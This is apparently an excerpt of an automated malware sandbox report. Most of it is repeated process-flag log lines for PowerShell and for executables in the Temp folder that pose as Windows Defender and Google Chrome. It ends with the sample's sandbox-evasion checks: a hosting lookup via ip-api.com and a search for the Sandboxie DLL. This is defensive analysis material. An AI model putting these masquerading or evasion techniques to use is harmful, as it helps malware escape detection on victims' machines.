                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: Windows Defender.exe, 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Windows Defender.exe.0.drBinary or memory string: SBIEDLL.DLL
